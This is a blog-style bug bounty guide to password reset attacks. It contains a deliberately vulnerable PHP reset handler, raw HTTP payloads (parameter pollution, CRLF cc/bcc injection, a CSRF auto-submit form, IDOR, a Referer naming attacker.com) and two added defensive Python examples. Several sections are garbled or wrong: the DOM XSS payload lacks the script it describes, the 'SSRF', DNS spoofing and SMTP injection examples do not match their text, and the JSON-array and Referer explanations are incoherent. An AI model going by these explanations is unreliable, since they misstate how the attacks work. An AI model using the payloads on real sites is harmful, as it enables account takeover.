Exploiting Password Reset Vulnerabilities: A Guide for Bug Bounty Hunters


This blog post provides a comprehensive guide for bug bounty hunters on how to exploit password reset vulnerabilities. It includes detailed explanations of various attack vectors, such as Password Reset Via Email Parameter and Password Reset Via Username Collision, and provides examples of how these vulnerabilities can be exploited using code snippets. By following the step-by-step instructions in this blog post, bug bounty hunters can identify and report these vulnerabilities to companies for fixing, helping to improve their overall security.

Password Reset Via Email Parameter

The Password Reset Via Email Parameter vulnerability can be exploited with a parameter pollution attack.

Consider the following code snippet for a password reset function:

<?php
// Vulnerable reset handler discussed in this post: $email is taken straight from
// the request and reused, unvalidated, in the SELECT, the UPDATE, the recipient
// passed to mail() and the reset link itself. The payloads in the following
// sections target exactly that reuse.
if(isset($_POST['reset'])){
   $email = $_POST['email'];
   $query = "SELECT * FROM users WHERE email = '$email'";
   $result = mysqli_query($conn,$query);
   if(mysqli_num_rows($result) > 0){
      // Token derived from uniqid()/rand(), not from a CSPRNG
      $token = md5(uniqid(rand(), true));
      $update = "UPDATE users SET token = '$token' WHERE email = '$email'";
      mysqli_query($conn,$update);
      $to = $email;
      $subject = "Password reset request";
      // The link embeds the submitted address next to the token
      $message = "Click on the link to reset your password: http://example.com/reset.php?email=$email&token=$token";
      $headers = "From: noreply@example.com";
      mail($to,$subject,$message,$headers);
      echo "Password reset link has been sent to your email.";
   }
   else{
      echo "Invalid email address.";
   }
}
?>

An attacker could exploit the password reset vulnerability using a parameter pollution attack by sending a POST request with multiple email parameters. Here’s an example of a payload for this attack:

POST /reset-password.php HTTP/1.1
Host: example.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 43

email=victim@mail.com&email=hacker@mail.com

In this example, the attacker sends a POST request with two email parameters, one for the victim’s email address and one for their own. When the server processes the request, it will pick the last value for the email parameter and send the password reset link to the attacker’s email address instead of the victim’s. The attacker can then use the password reset link to take over the victim’s account. 

Password Reset Via JSON Array Parameter

An attacker can exploit the password reset vulnerability by injecting a JSON array as a parameter. Here’s an example of what the payload for this attack could look like:

POST /reset-password.php HTTP/1.1
Host: example.com
Content-Type: application/json
Content-Length: 48

{"email": ["victim@mail.com","hacker@mail.com"]}

In this example, the attacker sends a POST request with an email parameter that contains an array of email addresses. When the server processes the request, it will pick the first value for the email parameter and send the password reset link to the victim’s email address. However, the attacker can still access the password reset link by intercepting the email sent to the victim’s inbox.

Password Reset Via Cookie Parameter

An attacker can exploit the password reset vulnerability by injecting a cookie as a parameter. Here’s an example of what the payload for this attack could look like:

POST /reset-password.php HTTP/1.1
Host: example.com
Content-Type: application/x-www-form-urlencoded
Cookie: email=hacker@mail.com
Content-Length: 21

email=victim@mail.com

In this example, the attacker sets a cookie with their email address and then sends a POST request with the victim’s email address as a parameter. When the server processes the request, it will use the email address from the cookie instead of the victim’s email address and send the password reset link to the attacker’s email address.

Password Reset Via URL Parameter

An attacker can exploit the password reset vulnerability by injecting a URL parameter. Here’s an example of what the payload for this attack could look like:

GET /reset-password.php?email=victim@mail.com&email=hacker@mail.com HTTP/1.1
Host: example.com

In this example, the attacker sends a GET request with two email parameters, one for the victim’s email address and one for their own. When the server processes the request, it will pick the last value for the email parameter and send the password reset link to the attacker’s email address instead of the victim’s.

Password Reset Via Carbon Copy Parameter

An attacker can exploit the password reset vulnerability by injecting a carbon copy parameter in the email field. Here’s an example of what the payload for this attack could look like:

POST /reset-password.php HTTP/1.1
Host: example.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 45

email=victim@mail.com%0A%0Dcc:hacker@mail.com

In this example, the attacker injects a carbon copy parameter with their email address in the email field, which is then processed by the server. The password reset link is sent to the victim’s email address as well as the attacker’s email address.

Password Reset Via BCC Parameter

An attacker can exploit the password reset vulnerability by injecting a blind carbon copy parameter in the email field. Here’s an example of what the payload for this attack could look like:

POST /reset-password.php HTTP/1.1
Host: example.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 46

email=victim@mail.com%0A%0Dbcc:hacker@mail.com

In this example, the attacker injects a blind carbon copy parameter with their email address in the email field, which is then processed by the server. The password reset link is sent to the victim’s email address as well as the attacker’s email address, but the victim is unaware of the attacker’s presence.

Password Reset Via Hidden Field Parameter

An attacker can exploit the password reset vulnerability by injecting a hidden field parameter in the email field. Here’s an example of what the payload for this attack could look like:

POST /reset-password.php HTTP/1.1
Host: example.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 68

email=victim@mail.com&hacker_email=hacker@mail.com&hacker_param=1234

In this example, the attacker injects a hidden field parameter with their email address in the email field, which is then processed by the server. The password reset link is sent to the victim’s email address as well as the attacker’s email address.
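Every payload in the sections above (a duplicated email field, a JSON array, a cookie, CRLF sequences carrying cc: or bcc:, and extra hidden fields) works only because the server accepts whatever arrives under the name email. The following Python function is an added example, not code from the original post or from PayloadsAllTheThings; it shows the input handling a reset endpoint needs in order to refuse those shapes before any address reaches a mail call. It reads the request body only (never a cookie or the query string), and the accepted content types, the EMAIL_RE pattern and the sample requests are assumptions constructed for this demonstration.

```python
"""Reject malformed password-reset requests before any e-mail is addressed.

Added example, not code from the original post. Only the request body is
consulted (never cookies or the query string), and the checks, EMAIL_RE and
the sample requests below are constructed for this demonstration.
"""
import json
import re
from urllib.parse import parse_qs

# One local part, one domain, no whitespace, control characters or ':'; this
# is what keeps %0A / %0D and a trailing cc:/bcc: out of the mail() call.
EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9-]+(\.[A-Za-z0-9-]+)*\.[A-Za-z]{2,}")


class ResetRequestError(ValueError):
    """The request is rejected outright instead of being parsed best-effort."""


def extract_email(content_type: str, body: str) -> str:
    """Return the single validated address in a reset request body, or raise."""
    media_type = content_type.split(";", 1)[0].strip().lower()
    if media_type == "application/x-www-form-urlencoded":
        # parse_qs keeps every repeated value, so pollution is visible instead
        # of being silently collapsed to the first or last occurrence.
        values = parse_qs(body, keep_blank_values=True).get("email", [])
        if len(values) != 1:
            raise ResetRequestError(f"expected exactly one email field, got {len(values)}")
        candidate = values[0]
    elif media_type == "application/json":
        try:
            data = json.loads(body)
        except json.JSONDecodeError as exc:
            raise ResetRequestError("malformed JSON body") from exc
        if not isinstance(data, dict) or not isinstance(data.get("email"), str):
            raise ResetRequestError("email must be a single JSON string")
        candidate = data["email"]
    else:
        raise ResetRequestError(f"unsupported content type: {media_type!r}")

    # Percent-decoding has already happened, so CR/LF from %0A%0D are literal
    # newlines here and fail the pattern.
    if len(candidate) > 254 or not EMAIL_RE.fullmatch(candidate):
        raise ResetRequestError("email address failed validation")
    return candidate.lower()


# Constructed requests mirroring the shapes shown in this post.
FORM = "application/x-www-form-urlencoded"
CONSTRUCTED_REQUESTS = [
    ("clean", FORM, "email=victim@mail.com"),
    ("pollution", FORM, "email=victim@mail.com&email=hacker@mail.com"),
    ("json_array", "application/json", '{"email": ["victim@mail.com","hacker@mail.com"]}'),
    ("json_string", "application/json", '{"email": "victim@mail.com"}'),
    ("cc_injection", FORM, "email=victim@mail.com%0A%0Dcc:hacker@mail.com"),
    ("bcc_injection", FORM, "email=victim@mail.com%0A%0Dbcc:hacker@mail.com"),
    ("extra_fields", FORM, "email=victim@mail.com&hacker_email=hacker@mail.com&hacker_param=1234"),
]


def triage(samples=CONSTRUCTED_REQUESTS) -> dict:
    """Map each sample label to the accepted address or a 'REJECTED: ...' reason."""
    outcome = {}
    for label, content_type, body in samples:
        try:
            outcome[label] = extract_email(content_type, body)
        except ResetRequestError as exc:
            outcome[label] = f"REJECTED: {exc}"
    return outcome


if __name__ == "__main__":
    for label, result in triage().items():
        print(f"{label:14} {result}")
```

Two design points are worth noting. Rejecting a repeated field outright, rather than choosing the first or last value, removes the ambiguity that parameter pollution depends on, and it makes the attempt visible in logs. The extra_fields sample is accepted: unknown fields are simply ignored, so the recipient is still the one validated address rather than anything carried in hacker_email.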

Password Reset via HTTP Referer Header

An attacker can exploit the password reset vulnerability by injecting an HTTP Referer header. Here’s an example of what the payload for this attack could look like:

GET /reset-password.php?email=victim@mail.com HTTP/1.1
Host: example.com
Referer: https://attacker.com/reset-password.php?token=TOKEN

In this example, the attacker injects an HTTP Referer header with their own URL that contains a password reset token. When the victim clicks on the password reset link, the token is leaked via the Referer header and the attacker can use it to reset the victim’s password.

Password Reset via DOM-Based XSS

An attacker can exploit the password reset vulnerability by injecting a DOM-Based XSS payload. Here’s an example of what the payload for this attack could look like:

GET /reset-password.php?email=victim@mail.com HTTP/1.1
Host: example.com

In this example, the attacker injects a script tag that redirects the user to a password reset page with a token extracted from the cookie. When the victim clicks on the password reset link, the token is leaked via the script tag and the attacker can use it to reset the victim’s password.

Password Reset via CSRF Attack

An attacker can exploit the password reset vulnerability by injecting a CSRF attack. Here’s an example of what the payload for this attack could look like:

<form action="https://example.com/reset-password.php" method="post">
  <input type="hidden" name="email" value="victim@mail.com">
  <input type="hidden" name="password" value="newpassword">
  <input type="submit" value="Submit">
</form>

In this example, the attacker injects a hidden form that submits a POST request to the password reset page with the victim’s email address and a new password. When the victim visits the attacker’s website, the request is automatically submitted and the victim’s password is reset.

Password Reset via Insecure Direct Object Reference (IDOR) Attack

An attacker can exploit the password reset vulnerability by performing an Insecure Direct Object Reference (IDOR) attack. Here’s an example of what the payload for this attack could look like:

GET /reset-password.php?user_id=123 HTTP/1.1
Host: example.com

In this example, the attacker manipulates the user_id parameter in the password reset URL to reset the password of a different user. This type of attack is possible when the password reset URL contains a predictable or sequential parameter, such as user IDs.
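The Referer, CSRF and IDOR sections above share a root cause: the reset URL identifies the account (an email or a user_id), the confirmation step accepts a new password without proof of possession of a token, or the token itself is weak and long-lived (the original snippet derives it from md5(uniqid(rand(), true))). The following Python code is an added example, not code from the original post or from PayloadsAllTheThings; it shows issuance and confirmation with the opposite properties: a CSPRNG token stored only as a hash and bound to the user id, a link that carries nothing but the token, single use, expiry, and a per-session anti-CSRF check on the confirmation POST. The in-memory store, FakeClock, the 15-minute lifetime and the example.com link format are assumptions constructed for the demonstration.

```python
"""Reset-token issuance and confirmation with the properties whose absence
the Referer, CSRF and IDOR sections describe.

Added example, not the blog's code. The in-memory store, FakeClock, TTL and
the example.com link format are constructed for this demonstration.
"""
import hashlib
import hmac
import os
import secrets
import time
from dataclasses import dataclass

TOKEN_TTL_SECONDS = 15 * 60  # assumption: a reset link is valid for 15 minutes

# Header the page that receives the reset link should send: with no-referrer the
# browser never copies the token-bearing URL into a Referer header on requests
# it makes to other origins.
RESET_PAGE_HEADERS = {"Referrer-Policy": "no-referrer"}


@dataclass
class ResetRecord:
    user_id: int
    expires_at: float
    used: bool = False


class FakeClock:
    """Controllable clock so expiry can be exercised without sleeping."""
    def __init__(self, start: float) -> None:
        self.now = start
    def __call__(self) -> float:
        return self.now
    def advance(self, seconds: float) -> None:
        self.now += seconds


def hash_password(password: str) -> str:
    """PBKDF2-SHA256 with a random salt; the salt is stored beside the hash."""
    salt = os.urandom(16)
    derived = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)
    return salt.hex() + ":" + derived.hex()


class ResetService:
    def __init__(self, clock=time.time) -> None:
        self.clock = clock
        self.users: dict[int, dict] = {}            # constructed stand-in for the users table
        self._records: dict[str, ResetRecord] = {}  # keyed by sha256(token), never the raw token

    @staticmethod
    def _digest(token: str) -> str:
        return hashlib.sha256(token.encode()).hexdigest()

    def issue(self, user_id: int) -> str:
        """256 random bits from the OS CSPRNG; only the hash is stored, bound
        to the user id, and the raw token is returned for the e-mail link."""
        token = secrets.token_urlsafe(32)
        self._records[self._digest(token)] = ResetRecord(
            user_id=user_id, expires_at=self.clock() + TOKEN_TTL_SECONDS
        )
        return token

    @staticmethod
    def reset_link(token: str) -> str:
        # The link carries the token only: no email and no user_id, so there is
        # nothing in the URL for a requester to enumerate or substitute.
        return f"https://example.com/reset.php?token={token}"

    def confirm(self, token: str, new_password: str, form_csrf: str, session_csrf: str) -> bool:
        """Set a new password. The account comes from the stored record, never
        from a request parameter; the token is single-use and expires; the POST
        must carry the anti-CSRF token held in the submitting user's session."""
        if not (form_csrf and session_csrf and hmac.compare_digest(form_csrf, session_csrf)):
            return False
        record = self._records.get(self._digest(token))
        if record is None or record.used or self.clock() > record.expires_at:
            return False
        record.used = True
        self.users[record.user_id]["password_hash"] = hash_password(new_password)
        return True


def demo() -> dict:
    """Walk through issue -> confirm with a fake clock; returns outcomes by label."""
    clock = FakeClock(1_700_000_000)
    svc = ResetService(clock)
    svc.users[123] = {"email": "victim@mail.com", "password_hash": None}
    csrf = secrets.token_hex(16)  # would live in the victim's session
    token = svc.issue(123)
    link = svc.reset_link(token)
    results = {
        "link_has_no_account_reference": "user_id" not in link and "email" not in link,
        "csrf_form_without_token": svc.confirm(token, "newpassword", "", csrf),
        "unknown_token": svc.confirm("not-a-real-token", "newpassword", csrf, csrf),
        "valid_reset": svc.confirm(token, "newpassword", csrf, csrf),
        "token_replay": svc.confirm(token, "other", csrf, csrf),
    }
    token2 = svc.issue(123)
    clock.advance(TOKEN_TTL_SECONDS + 1)
    results["expired_token"] = svc.confirm(token2, "other", csrf, csrf)
    return results


if __name__ == "__main__":
    for label, outcome in demo().items():
        print(f"{label}: {outcome}")
```

The hidden form from the CSRF section corresponds to the csrf_form_without_token case: a cross-origin page cannot read the session's anti-CSRF value, so the POST it submits is refused even when it carries a valid token. The IDOR case is closed structurally rather than by a check: confirm() never reads an account identifier from the request, so there is no user_id to manipulate.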

Password Reset via Server-Side Request Forgery (SSRF) Attack

An attacker can exploit the password reset vulnerability by performing a Server-Side Request Forgery (SSRF) attack. Here’s an example of what the payload for this attack could look like:

GET /reset-password.php?email=victim@mail.com HTTP/1.1
Host: example.com

In this example, the attacker sends a password reset request to the server with the victim’s email address. The server retrieves the password reset token and sends an email to the victim with a link to reset their password. However, the attacker has intercepted the email and modified the link to redirect the victim to a malicious website. When the victim clicks on the link, the attacker can steal their password reset token and use it to reset their password.

Password Reset via DNS Spoofing

An attacker can exploit the password reset vulnerability by performing a DNS Spoofing attack. Here’s an example of what the payload for this attack could look like:

GET /reset-password.php?email=victim@mail.com HTTP/1.1
Host: example.com

In this example, the attacker sends a password reset request to the server with the victim’s email address. The server retrieves the password reset token and sends an email to the victim with a link to reset their password. However, the attacker has intercepted the DNS response and modified the server’s IP address to redirect the victim to a malicious website. When the victim clicks on the link, the attacker can steal their password reset token and use it to reset their password.

Password Reset via SMTP Injection

An attacker can exploit the password reset vulnerability by injecting malicious commands into the Simple Mail Transfer Protocol (SMTP) message used to send the password reset email. For example, the attacker may use the following payload to inject a fake password reset token:

GET /reset-password.php?token=FAKE_TOKEN HTTP/1.1
Host: example.com

In this example, the attacker injects a fake password reset token into the SMTP message, which is then used to send a password reset email to the victim. When the victim clicks on the link, the attacker can steal their password reset token and use it to reset their password.

It’s important to note that these examples are just a few of the many attack vectors that can be used to exploit password reset vulnerabilities. Bug bounty hunters should always use ethical hacking practices and obtain appropriate authorization before attempting to exploit vulnerabilities.

Reference: https://github.com/swisskyrepo/PayloadsAllTheThings